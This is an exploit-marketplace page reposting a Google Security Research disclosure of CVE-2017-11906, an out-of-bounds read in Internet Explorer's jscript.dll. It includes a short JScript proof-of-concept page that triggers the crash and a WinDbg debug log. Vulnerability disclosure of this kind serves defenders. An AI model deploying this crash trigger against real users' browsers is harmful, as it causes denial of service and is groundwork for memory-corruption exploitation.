[ home ]  [ private ]  [ 0Day ]  [ discount ]  [ Get Gold ]  [ platforms ]  [ pentest ]  [ search ]  [ faq ]  [ contact ]  [ style ]  [ Prices in Gold ]   db: 39 583    
0day Today Exploit DB Official Facebook
0day Today Exploit DB Official Twitter
0day Today Exploit DB Official RSS Channel
Tor
We DO NOT use Telegram or any messengers / social networks!
We DO NOT use Telegram or any messengers / social networks!

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

 
0day.today - Biggest Exploit Database in the World.
Select your language:  
English
English
Русский
Русский
Deutsch
Deutsch
Türkçe
Türkçe
Français
Français
Italiano
Italiano
Español
Español
Romania
Romania
Polskie
Polskie
العربية
العربية
Japan
Japan
China
China
Things you should know about 0day.today:
  • We use one main domain: http://0day.today
  • Most of the materials is completely FREE
  • If you want to purchase the exploit / get V.I.P. access or pay for any other service,
    you need to buy or earn GOLD
We accept currencies: [contact admin to find more]
           
We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks! We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
I am registered user of 0day.today. I don't want to see this screen in future.
What to do first?
  1. Read the [ agreement ]
  2. Read the [ Submit ] rules
  3. Visit the [ faq ] page
  4. [ Register ] profile
  5. Get [ GOLD ]
  6. If you want to [ sell ]
  7. If you want to [ buy ]
  8. If you lost [ Account ]
  9. Any questions [ admin@0day.today ]


Main links


You can contact us by

Mail:
mr.inj3ct0r@gmail.com
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
Mail:
mr.inj3ct0r@gmail.com
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
0day Today Exploits Market and 0day Exploits Database

Microsoft Windows jscript!RegExpFncObj::LastParen Out-Of-Bounds Read Exploit

Author
Google Security Research
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-29262
Category
dos / poc
Date add
19-12-2017
CVE
CVE-2017-11906
Platform
windows
Windows: out-of-bounds read in jscript!RegExpFncObj::LastParen 

CVE-2017-11906


There is an out-of-bounds read in jscript.dll library (used in IE, WPAD and other places):

PoC for IE (note: page heap might be required to obsorve the crash):

=========================================

<!-- saved from url=(0014)about:internet -->
<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
<script language="Jscript.Encode">

function go() {
  var r= new RegExp(Array(100).join('()'));
  ''.search(r);
  alert(RegExp.lastParen);
}

go();

</script>

=========================================

Debug log:

=========================================

(cec.a14): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
jscript!RegExpFncObj::LastParen+0x43:
000007fe`f23d3813 4863accbac000000 movsxd  rbp,dword ptr [rbx+rcx*8+0ACh] ds:00000000`04770154=????????

0:014> r
rax=0000000000000063 rbx=000000000476fd90 rcx=0000000000000063
rdx=0000000000000064 rsi=000000000476fd90 rdi=000007fef23d37d0
rip=000007fef23d3813 rsp=00000000130f9090 rbp=00000000130f9148
 <a href="https://crrev.com/8" title="" class="" rel="nofollow">r8</a>=00000000130f9210  <a href="https://crrev.com/9" title="" class="" rel="nofollow">r9</a>=0000000000000000 <a href="https://crrev.com/10" title="" class="" rel="nofollow">r10</a>=000000000463fef0
<a href="https://crrev.com/11" title="" class="" rel="nofollow">r11</a>=000000000463ff38 <a href="https://crrev.com/12" title="" class="" rel="nofollow">r12</a>=0000000000000083 <a href="https://crrev.com/13" title="" class="" rel="nofollow">r13</a>=0000000000000000
<a href="https://crrev.com/14" title="" class="" rel="nofollow">r14</a>=00000000130f9210 <a href="https://crrev.com/15" title="" class="" rel="nofollow">r15</a>=0000000000000000
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
jscript!RegExpFncObj::LastParen+0x43:
000007fe`f23d3813 4863accbac000000 movsxd  rbp,dword ptr [rbx+rcx*8+0ACh] ds:00000000`04770154=????????

0:014> k
 # Child-SP          RetAddr           Call Site
00 00000000`130f9090 000007fe`f2385e6d jscript!RegExpFncObj::LastParen+0x43
01 00000000`130f90e0 000007fe`f236b293 jscript!NameTbl::GetVal+0x3d5
02 00000000`130f9170 000007fe`f2369d27 jscript!VAR::InvokeByName+0x873
03 00000000`130f9380 000007fe`f2368ec2 jscript!CScriptRuntime::Run+0x373
04 00000000`130fa180 000007fe`f23694b3 jscript!ScrFncObj::CallWithFrameOnStack+0x162
05 00000000`130fa390 000007fe`f23686ea jscript!NameTbl::InvokeInternal+0x2d3
06 00000000`130fa4b0 000007fe`f23624b8 jscript!VAR::InvokeByDispID+0xffffffff`ffffffea
07 00000000`130fa500 000007fe`f2368ec2 jscript!CScriptRuntime::Run+0x5a6
08 00000000`130fb300 000007fe`f2368d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162
09 00000000`130fb510 000007fe`f2368b95 jscript!ScrFncObj::Call+0xb7
0a 00000000`130fb5b0 000007fe`f236e6c0 jscript!CSession::Execute+0x19e
0b 00000000`130fb680 000007fe`f23770e7 jscript!COleScript::ExecutePendingScripts+0x17a
0c 00000000`130fb750 000007fe`f23768d6 jscript!COleScript::ParseScriptTextCore+0x267
0d 00000000`130fb840 000007fe`e9a85251 jscript!COleScript::ParseScriptText+0x56
0e 00000000`130fb8a0 000007fe`ea20b320 MSHTML!CActiveScriptHolder::ParseScriptText+0xc1
0f 00000000`130fb920 000007fe`e9a86256 MSHTML!CScriptCollection::ParseScriptText+0x37f
10 00000000`130fba00 000007fe`e9a85c8e MSHTML!CScriptData::CommitCode+0x3d9
11 00000000`130fbbd0 000007fe`e9a85a11 MSHTML!CScriptData::Execute+0x283
12 00000000`130fbc90 000007fe`ea2446fb MSHTML!CHtmScriptParseCtx::Execute+0x101
13 00000000`130fbcd0 000007fe`e9b28a5b MSHTML!CHtmParseBase::Execute+0x235
14 00000000`130fbd70 000007fe`e9a02e39 MSHTML!CHtmPost::Broadcast+0x90
15 00000000`130fbdb0 000007fe`e9a5caef MSHTML!CHtmPost::Exec+0x4bb
16 00000000`130fbfc0 000007fe`e9a5ca40 MSHTML!CHtmPost::Run+0x3f
17 00000000`130fbff0 000007fe`e9a5da12 MSHTML!PostManExecute+0x70
18 00000000`130fc070 000007fe`e9a60843 MSHTML!PostManResume+0xa1
19 00000000`130fc0b0 000007fe`e9a46fc7 MSHTML!CHtmPost::OnDwnChanCallback+0x43
1a 00000000`130fc100 000007fe`ea274f78 MSHTML!CDwnChan::OnMethodCall+0x41
1b 00000000`130fc130 000007fe`e9969d75 MSHTML!GlobalWndOnMethodCall+0x240
1c 00000000`130fc1d0 00000000`771f9bbd MSHTML!GlobalWndProc+0x150
1d 00000000`130fc250 00000000`771f98c2 USER32!UserCallWinProcCheckWow+0x1ad
1e 00000000`130fc310 000007fe`f2694a87 USER32!DispatchMessageWorker+0x3b5
1f 00000000`130fc390 000007fe`f269babb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555
20 00000000`130ff610 000007fe`fe4c572f IEFRAME!LCIETab_ThreadProc+0x3a3
21 00000000`130ff740 000007fe`f535925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f
22 00000000`130ff770 00000000`772f59cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f
23 00000000`130ff7c0 00000000`7742a561 kernel32!BaseThreadInitThunk+0xd
24 00000000`130ff7f0 00000000`00000000 ntdll!RtlUserThreadStart+0x1d

=========================================


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.




Found by: ifratric

#  0day.today [2024-11-16]  #
0day Today Exploit Database buy and sell exploits type (local, remote, DoS, PoC, etc.)
Send all submissions to mr.inj3ct0r[at]gmail.com
Copyright © 2008-2024 0day Today Team